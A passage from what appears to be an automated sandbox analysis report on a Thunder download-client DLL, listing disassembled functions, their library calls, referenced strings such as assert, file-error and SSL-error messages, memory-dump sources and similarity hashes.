                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075655
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075664
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075673
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100756B4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100756BD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100756CD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,?), ref: 10075710
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007571D
                                                                                                                                                • Part of subcall function 1008B399: __EH_prolog.LIBCMT ref: 1008B39E
                                                                                                                                                • Part of subcall function 1008B399: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,100755E4), ref: 1008B3BF
                                                                                                                                                • Part of subcall function 1008B399: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100755E4), ref: 1008B3CF
                                                                                                                                                • Part of subcall function 1008B399: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100755E4), ref: 1008B3DF
                                                                                                                                                • Part of subcall function 1008B399: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100755E4), ref: 1008B3EF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$?assign@?$basic_string@V12@V12@@$??1?$basic_string@H_prologmemcpy$malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2081339788-0
                                                                                                                                              • Opcode ID: 984a878c8e5e2307cd59505d2ceb8cfdcad2bd1b295cb4edbbb34a47a6ebfe24
                                                                                                                                              • Instruction ID: e5145a6b3d1a12e2992dfa4751d3adf2e4689ba9d7c83205e631dc3acb2e6172
                                                                                                                                              • Opcode Fuzzy Hash: 984a878c8e5e2307cd59505d2ceb8cfdcad2bd1b295cb4edbbb34a47a6ebfe24
                                                                                                                                              • Instruction Fuzzy Hash: 66515A75900259DFCB14CFA8C889ADEBBF4FF18314F00855AF89AA7251DB71AA45CF60
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100740D7
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10074132
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007413F
                                                                                                                                              • memcpy.MSVCR71(000000AC,?,00000014,?,?,?), ref: 1007419B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100741A9
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100741D3
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100741E2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10074224
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1007423A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10074247
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10074254
                                                                                                                                                • Part of subcall function 1008A9C7: __EH_prolog.LIBCMT ref: 1008A9CC
                                                                                                                                                • Part of subcall function 1008A9C7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,10073FBC), ref: 1008A9ED
                                                                                                                                                • Part of subcall function 1008A9C7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,10073FBC), ref: 1008A9FD
                                                                                                                                                • Part of subcall function 1008A9C7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,10073FBC), ref: 1008AA0D
                                                                                                                                                • Part of subcall function 1008A9C7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,10073FBC), ref: 1008AA1D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$?assign@?$basic_string@V12@V12@@$??1?$basic_string@$H_prolog$mallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1598780573-0
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,00000001,00000000,?), ref: 100B0473
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(filter_domins), ref: 100B0489
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100B04A0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B04DC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B04EE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B0500
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100B0584
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@
                                                                                                                                              • String ID: filter_domins$partner_flow_statisitics
                                                                                                                                              • API String ID: 2848398397-1528627388
                                                                                                                                              APIs
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 10045427
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 10045436
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: InitializeSecurityContext call error), ref: 10045443
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 1004546B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL handshake: InitializeSecurityContext throw exception,?,102B6AA0,?), ref: 10045478
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 1004549D
                                                                                                                                              Strings
                                                                                                                                              • SSL handshake: send data to server error! throw exception, xrefs: 10045420
                                                                                                                                              • SSL handshake: InitializeSecurityContext throw exception, xrefs: 10045470
                                                                                                                                              • SSL handshake: InitializeSecurityContext call error, xrefs: 1004543B
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@ExceptionThrowU?$char_traits@V?$allocator@$??0exception@@$V01@@
                                                                                                                                              • String ID: SSL handshake: InitializeSecurityContext call error$SSL handshake: InitializeSecurityContext throw exception$SSL handshake: send data to server error! throw exception
                                                                                                                                              • API String ID: 2168885925-671814026
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)), ref: 100A52B1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A52C8
                                                                                                                                                • Part of subcall function 1000F0E0: _itoa.MSVCR71 ref: 1000F107
                                                                                                                                                • Part of subcall function 1000F0E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,1001F579), ref: 1000F117
                                                                                                                                                • Part of subcall function 10071E70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071EC9
                                                                                                                                                • Part of subcall function 10071E70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10071F4C
                                                                                                                                                • Part of subcall function 10071E70: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071F66
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100A5315
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5324
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5333
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5341
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5353
                                                                                                                                              Strings
                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727), xrefs: 100A52A8
                                                                                                                                              • user_agent_array, xrefs: 100A52B7
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$?assign@?$basic_string@V01@@V12@V12@@_itoa
                                                                                                                                              • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)$user_agent_array
                                                                                                                                              • API String ID: 78673402-3191899580
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,?,10251410,000000FF,100B29F3), ref: 100D81DC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10251410,000000FF,100B29F3), ref: 100D81ED
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10251410,000000FF,100B29F3), ref: 100D81FE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10251410,000000FF,100B29F3), ref: 100D820C
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D821C
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D822F
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D8242
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D8255
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,10251410,000000FF,100B29F3), ref: 100D8268
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(00000001,?,?,?,10251410,000000FF,100B29F3), ref: 100D827B
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100E01D9
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,00000014), ref: 100B4554
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,00000014,00000000), ref: 100B4585
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,?,00000000), ref: 100B45FC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,?,00000000), ref: 100B460E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,?,00000000), ref: 100B4623
                                                                                                                                                • Part of subcall function 100B3A20: __RTDynamicCast.MSVCR71(?,00000000,103010A4,103010CC,00000000,?,?,?), ref: 100B3A86
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B23A3
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B23B4
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B23EB
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2400
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B2424
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2438
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000001,00000000), ref: 100B246D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?assign@?$basic_string@V12@V12@@$??0?$basic_string@$CastDynamic
                                                                                                                                              • String ID: -1 == _exit_state$.\p2s_task_event_handler.cpp$thunder_assert
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100DC06B
                                                                                                                                              • _CxxThrowException.MSVCR71(00000000,00000000), ref: 100DC077
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC110
                                                                                                                                                • Part of subcall function 10013C80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CStringSetter,00000000,?,?,10240554,000000FF,1000417F,?), ref: 10013CA9
                                                                                                                                                • Part of subcall function 10013C80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10013CCF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC19D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC1DB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC30B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100DC36D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??3@ExceptionThrow
                                                                                                                                              • String ID: c
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00002001), ref: 100A54A8
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A557C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A5597
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@?assign@?$basic_string@V12@V12@@
                                                                                                                                              • String ID: (unsigned)_small_file_pos < _process_full_paths.size()$.\http_data_pipe.cpp$_cur_process_path_pos < _process_full_paths.size()$_small_file_pos >= 0$thunder_assert
                                                                                                                                              APIs
                                                                                                                                              • ReadFileScatter.KERNEL32(?,?,?,00000000,?), ref: 1003D769
                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,?), ref: 1003D774
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(fast read error,?,?,00000000,?), ref: 1003D793
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000,?,?,00000000,?), ref: 1003D7B9
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionFileH_prologLastReadScatterThrowV01@@
                                                                                                                                              • String ID: .\asyn_file_device.cpp$fast read error$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,?), ref: 1003D510
                                                                                                                                              • GetLastError.KERNEL32 ref: 1003D51B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(file read error), ref: 1003D53A
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000), ref: 1003D560
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionFileH_prologLastReadThrowV01@@
                                                                                                                                              • String ID: .\asyn_file_device.cpp$file read error$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 3484420861-2565288009
                                                                                                                                              • Opcode ID: 95ddb5db941de951eb65dac18aa7beb7c65ffc3ee25062e437135e1610e47887
                                                                                                                                              • Instruction ID: c0c281210f757c9ddd7480c9d8b205b00b10e941ab7d572f13d9e89aa7bce22b
                                                                                                                                              • Opcode Fuzzy Hash: 95ddb5db941de951eb65dac18aa7beb7c65ffc3ee25062e437135e1610e47887
                                                                                                                                              • Instruction Fuzzy Hash: E9318976104B80AFC321CF28C884FABB7E5FB99314F408A1DF19A83641DB34B409CBA1
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,?), ref: 1003D632
                                                                                                                                              • GetLastError.KERNEL32 ref: 1003D63D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(file write error), ref: 1003D65D
                                                                                                                                              • _CxxThrowException.MSVCR71(00000001,102B5DEC), ref: 1003D684
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionFileH_prologLastThrowV01@@Write
                                                                                                                                              • String ID: .\asyn_file_device.cpp$file write error$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 2391062310-1122603868
                                                                                                                                              • Opcode ID: cd20233cf2fd9173745e2924df9b1c8de949f79f9abfef9cc84bf1c42f9938ca
                                                                                                                                              • Instruction ID: 714e6304edd5f1086b9823d01892f433de86ad78344183c3d8cc0d327307bb45
                                                                                                                                              • Opcode Fuzzy Hash: cd20233cf2fd9173745e2924df9b1c8de949f79f9abfef9cc84bf1c42f9938ca
                                                                                                                                              • Instruction Fuzzy Hash: 88317A75104680AFD721CB24C885FABB7E4FB99318F408A0DF49A87641DB34B415CBA2
                                                                                                                                              APIs
